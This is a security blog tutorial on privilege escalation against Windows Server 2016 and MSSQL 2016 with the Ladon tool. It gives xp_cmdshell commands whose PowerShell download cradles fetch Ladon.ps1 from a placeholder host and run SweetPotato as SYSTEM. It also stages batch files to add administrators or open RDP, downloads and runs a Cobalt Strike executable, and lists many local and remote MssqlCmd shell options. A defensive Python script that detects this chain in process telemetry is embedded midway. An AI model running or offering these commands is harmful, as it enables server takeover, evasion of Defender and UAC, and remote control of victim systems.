
K8哥哥

There is no absolutely secure system

[Tutorial] Ladon privilege escalation on Win2016/Win10/MSSQL2016

This article was published 1524 days ago

Test environment

Windows Server 2016
SQL: 13.0.1601.5
Microsoft Windows [Version 10.0.14393]

Ladon local-user privilege escalation

I looked for some LPE exploits online and found that Defender kills them outright (virus definitions updated to 2021.1.19). Ladon is not flagged, and an administrator account limited by UAC can be elevated with BypassUac.

MSSQL remote loading of Ladon for privilege escalation

Commands executed through SQL queries run as network service.

Remote in-memory loading of PowerLadon for privilege escalation

exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxxxx:800/Ladon.ps1''); Ladon SweetPotato "whoami""'


Writing multi-line commands into a BAT file with ECHO for privilege escalation

exec master..xp_cmdshell 'echo whoami > c:\users\public\test.bat'

The same ECHO can write a command that adds an administrator user or opens 3389, among other things (apply the idea, don't stop at WHOAMI).

Execute the BAT file with SYSTEM privileges

exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon SweetPotato "c:\users\public\test.bat""'

Download the Cobalt Strike EXE with wget

exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon wget https://k8gege.org/cs.exe"'

Execute CS with SYSTEM privileges

exec master..xp_cmdshell 'powershell "IEX (New-Object Net.WebClient).DownloadString(''http://xxxx:800/Ladon.ps1''); Ladon SweetPotato "c:\users\public\cs.exe""'
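The chain above (xp_cmdshell launching cmd.exe under NETWORK SERVICE, a PowerShell download cradle, a batch file echoed into C:\Users\Public, then a potato-style LPE handed that file) is also exactly what a defender looks for in process-creation telemetry. The following is an added example, not code from the original post or from the Ladon project: it scores constructed Sysmon-style events whose field names (ParentImage, Image, CommandLine, User) are an assumption, and it shows why a SQL Agent backup job and an interactive PowerShell session should stay quiet while the xp_cmdshell events do not.

```python
"""Triage of process-creation telemetry for the xp_cmdshell chain described on
this page: sqlservr.exe spawning a shell as NETWORK SERVICE, a PowerShell
download cradle, a .bat dropped under C:\\Users\\Public, and a potato-style
local privilege escalation keyword on the command line.

Added example, not part of the original post or of the Ladon project. The
event records are constructed; the field names (ParentImage, Image,
CommandLine, User) are assumed to follow the Sysmon Event ID 1 layout.
"""
import ntpath
import re
from dataclasses import dataclass

# Interpreters that xp_cmdshell and its payloads are seen launching.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe"}

# Download-cradle primitives used in the commands on this page.
CRADLE_RE = re.compile(
    r"(?i)\b(Invoke-Expression|IEX|DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient)\b")
# "echo ... > C:\Users\Public\*.bat": a script staged in a world-writable path.
BAT_WRITE_RE = re.compile(r"(?i)\becho\b[^>]*>\s*\"?c:\\users\\public\\[^\s\"]+\.bat")
# Potato-family LPE names that appear on this page.
POTATO_RE = re.compile(r"(?i)\b(SweetPotato|EfsPotato|BadPotato)\b")


@dataclass(frozen=True)
class Finding:
    event_id: int
    rule: str
    severity: str
    detail: str


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def evaluate(event: dict) -> list:
    """Return the findings for one process-creation event."""
    findings = []
    parent, child = _base(event.get("ParentImage", "")), _base(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    user = event.get("User", "")
    # xp_cmdshell runs cmd.exe directly under the SQL Server service process.
    from_sql = parent == "sqlservr.exe" and child in SHELLS
    if from_sql:
        findings.append(Finding(event["id"], "sqlservr_spawns_shell", "high",
                                f"{parent} -> {child} as {user}"))
    m = CRADLE_RE.search(cmd)
    if m:
        # A cradle from a SQL Server child is far more suspicious than from a user shell.
        findings.append(Finding(event["id"], "download_cradle",
                                "high" if from_sql else "medium", m.group(1)))
    if BAT_WRITE_RE.search(cmd):
        findings.append(Finding(event["id"], "bat_staged_in_public", "medium",
                                "echo redirect into C:\\Users\\Public"))
    m = POTATO_RE.search(cmd)
    if m:
        findings.append(Finding(event["id"], "potato_lpe_keyword", "high", m.group(1)))
    return findings


def triage(events) -> list:
    """Flatten the findings for a batch of events."""
    return [f for e in events for f in evaluate(e)]


def rules_for(event) -> list:
    return sorted(f.rule for f in evaluate(event))


def max_severity(findings) -> str:
    order = {"none": 0, "medium": 1, "high": 2}
    return max((f.severity for f in findings), key=order.__getitem__, default="none")


# Constructed sample telemetry (not real logs); 198.51.100.7 is a documentation address.
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL13.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    # 1: in-memory cradle plus SweetPotato, launched through xp_cmdshell.
    {"id": 1, "ParentImage": SQLSERVR, "Image": CMD, "User": r"NT AUTHORITY\NETWORK SERVICE",
     "CommandLine": r'''"C:\Windows\System32\cmd.exe" /c powershell "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7:800/Ladon.ps1'); Ladon SweetPotato whoami"'''},
    # 2: a batch file staged under C:\Users\Public via echo.
    {"id": 2, "ParentImage": SQLSERVR, "Image": CMD, "User": r"NT AUTHORITY\NETWORK SERVICE",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c echo whoami > c:\users\public\test.bat'},
    # 3: ordinary interactive PowerShell from a DBA; must stay quiet.
    {"id": 3, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "User": r"CORP\dba", "CommandLine": r"powershell.exe -NoProfile -Command Get-Service MSSQLSERVER"},
    # 4: SQL Agent job copying a backup; the parent is SQLAGENT.EXE, not sqlservr.exe.
    {"id": 4, "ParentImage": r"C:\Program Files\Microsoft SQL Server\MSSQL13.MSSQLSERVER\MSSQL\Binn\SQLAGENT.EXE",
     "Image": CMD, "User": r"NT SERVICE\SQLSERVERAGENT",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c copy D:\Backup\prod.bak \\nas01\sqlbackup\prod.bak'},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"event {f.event_id}: [{f.severity}] {f.rule}: {f.detail}")
```

The parent-image rule alone catches every xp_cmdshell invocation regardless of payload, which is why the page's note that queries run as network service matters: a cmd.exe child of sqlservr.exe under that account has no legitimate interactive reason to exist, and the cradle and potato keywords only raise the score. Disabling xp_cmdshell with sp_configure where it is not needed removes the first link of this chain entirely.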

MSSQL database remote privilege-escalation tool


Local:

Ladon MssqlCmd host info
Ladon MssqlCmd host open_shell
Ladon MssqlCmd host close_shell
Ladon MssqlCmd host xp_cmdshell cmdline
Ladon MssqlCmd host ws_shell cmdline
Ladon MssqlCmd host r_shell cmdline
Ladon MssqlCmd host py_shell cmdline
Ladon MssqlCmd host install_clr
Ladon MssqlCmd host uninstall_clr
Ladon MssqlCmd host clr_exec cmdline
Ladon MssqlCmd host clr_efspotato cmdline
Ladon MssqlCmd host clr_badpotato cmdline

Remote:

Ladon MssqlCmd host user pass master info
Ladon MssqlCmd host port user pass master open_shell
Ladon MssqlCmd host port user pass master close_shell
Ladon MssqlCmd host user pass master xp_cmdshell cmdline
Ladon MssqlCmd host user pass master ws_shell cmdline
Ladon MssqlCmd host user pass master r_shell cmdline
Ladon MssqlCmd host user pass master py_shell cmdline
Ladon MssqlCmd host user pass master install_clr
Ladon MssqlCmd host user pass master uninstall_clr
Ladon MssqlCmd host user pass master clr_exec cmdline
Ladon MssqlCmd host user pass master clr_efspotato cmdline
Ladon MssqlCmd host user pass master clr_badpotato cmdline


Cobalt Strike

Local host:
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host info
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host open_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host close_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host xp_cmdshell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host ws_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host r_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host py_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host install_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host uninstall_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host clr_exec cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host clr_efspotato cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host clr_badpotato cmdline

Remote:
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master info
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host port user pass master open_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host port user pass master close_shell
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master xp_cmdshell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master ws_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master r_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master py_shell cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master install_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master uninstall_clr
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master clr_exec cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master clr_efspotato cmdline
shell powershell -ExecutionPolicy Bypass Import-Module .\Ladon.ps1;Ladon MssqlCmd host user pass master clr_badpotato cmdline

Tool download

Latest version: https://k8gege.org/Download
Previous versions: https://github.com/k8gege/Ladon/releases
